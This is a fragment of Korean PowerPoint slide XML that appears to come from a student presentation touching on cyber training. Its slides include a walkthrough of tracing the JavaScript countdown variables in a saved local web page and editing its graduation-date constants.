            <a:off x="587830" y="2543051"/>
            <a:ext cx="5208698" cy="1676363"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="16" name="그림 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA78ABBC-DF00-4F17-A1CB-2A3BA2B364C5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6204621" y="774605"/>
            <a:ext cx="5255067" cy="2450056"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="124692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14" name="타원 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9A03EF22-1F43-4BA2-802B-035798714593}"/>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5" name="타원 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CF206B3A-240C-4F18-AC71-245AC16E94A1}"/>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16" name="TextBox 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D6EC8A16-26B1-4B6E-AA5B-2B2DEB775197}"/>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17" name="직선 화살표 연결선 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D53CBAC4-8B67-42F9-9607-49B5A5914F14}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="15"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8415A46-B843-4F0F-AC2E-B89C8654E544}"/>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19" name="TextBox 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6302E5C3-6766-429C-B263-F7B57A3A455F}"/>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20" name="직선 화살표 연결선 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{687471F3-3B10-4136-855C-593685FE5A71}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="18"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국방과학연구소 사이버 연수원 – Apps i Google Play">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{948E1B46-875D-4968-A193-286FC639B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124" y="2550902"/>
            <a:ext cx="1200397" cy="120039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국방과학연구소 연구원 퇴직 때 기밀 68만건 빼내…수사 착수 :: 공감언론 뉴시스통신사 ::">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5877791A-11B3-4B78-885F-1A0B7FD21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841" y="2814429"/>
            <a:ext cx="2897203" cy="19963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42A30F-992E-49F9-9352-7D153FD0D5B6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1286213" y="4871439"/>
            <a:ext cx="2167247" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>서울 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>본부 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>부 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>사이버</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="그림 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B0DF5B89-29AB-4583-AA0A-2FC756E18CA7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6004171" y="1141302"/>
            <a:ext cx="5074530" cy="3714080"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{29B7D774-AFFF-44F4-8FF6-DFE4F739CA4E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6665578" y="4901788"/>
            <a:ext cx="5658592" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>https://ieeexplore.ieee.org/document/8999252</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3961807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kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>정보의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="4400" kern="0" spc="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>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좋은 웹 사이트를 찾았다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남은 시간이 줄어드는 것을 보고있으면 가슴이 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>웅장해진다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근데 졸업시간은 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>.. 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신데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페이지를</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수정해야 겠다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시간을 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>수정하시오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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>: 2023</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>년 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00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시</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진수를 프로그래밍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highlightClick="1"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{79F8FB73-2BD4-477B-A393-B21B8149D461}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3376551" y="4871853"/>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0254332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Content/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>itCS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/calendar.php-55.html </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>를 열어서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>toString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>이 있는지 확인해보자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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>코드를 추적 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>추측</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>한다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sLeft</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="900" dirty="0"/>
              <a:t>를 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0"/>
              <a:t>16</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="900" dirty="0"/>
              <a:t>진수로 표현을 하였기 때문에</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sLeft</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="900" dirty="0"/>
              <a:t>가 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="900" dirty="0" err="1"/>
              <a:t>초단위</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="900" dirty="0"/>
              <a:t> 남은 시간임을 확인할 수 있다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="900" dirty="0"/>
              <a:t>다시 윗줄을 보니 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>msLeft</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="900" dirty="0"/>
              <a:t>변수를 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0"/>
              <a:t>1000 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="900" dirty="0"/>
              <a:t>으로 나누어 준 후 버림</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0" err="1"/>
              <a:t>Math.floor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="900" dirty="0"/>
              <a:t>을 취한다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>msLeft</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="900" dirty="0"/>
              <a:t>는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0" err="1"/>
              <a:t>ms</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="900" dirty="0"/>
              <a:t> 단위의 남은 시간임을 알 수 있다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>msLeft</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="900" dirty="0"/>
              <a:t> 는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>BigDay</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0" err="1"/>
              <a:t>.getTime</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0"/>
              <a:t>() </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="900" dirty="0"/>
              <a:t>에서  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0" err="1"/>
              <a:t>today.getTime</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="900" dirty="0"/>
              <a:t>을 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="900" dirty="0" err="1"/>
              <a:t>뺀것이다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0"/>
              <a:t>! </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="900" dirty="0"/>
              <a:t>추측이 맞았다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="900" dirty="0"/>
              <a:t>졸업 날짜는 바로 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>BigDay</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="900" dirty="0"/>
              <a:t>에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="900" dirty="0" err="1"/>
              <a:t>적혀있을</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="900" dirty="0"/>
              <a:t> 것이다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>BigDay</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="900" dirty="0"/>
              <a:t>는</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0"/>
              <a:t>, Date( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ygYYYY</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ygGradMonty</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ygGradDay</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ygGradTime</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0"/>
              <a:t>  … ) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="900" dirty="0"/>
              <a:t>로 이루어져 있다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="900" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>3. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>ygYYYY</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> 를 다시 검색해보자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코드를 찾았다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>2023, 3, 5, 12 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>를 각각 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>2023, 3, 7, 9 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>로</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>바꾸고 페이지를 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>새로고침</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> 한다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="화살표: 오른쪽 6">
            <a:hlinkClick r:id="rId2" action="ppaction://hlinksldjump"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{42893F0B-BB75-49F6-9E0C-FB68161D4A9B}"/>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C2E6C3B6-1B9D-4BCE-8779-A298D22BAADC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="510639" y="760886"/>
            <a:ext cx="5302332" cy="1162228"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="그림 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A9EDB3B5-3C52-494A-9587-5AFA216ED003}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="510639" y="4393561"/>
            <a:ext cx="5302332" cy="1445595"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D3C45643-6E01-43B4-A174-E947C1AC67C8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6234814" y="368998"/>
            <a:ext cx="5616792" cy="6120000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
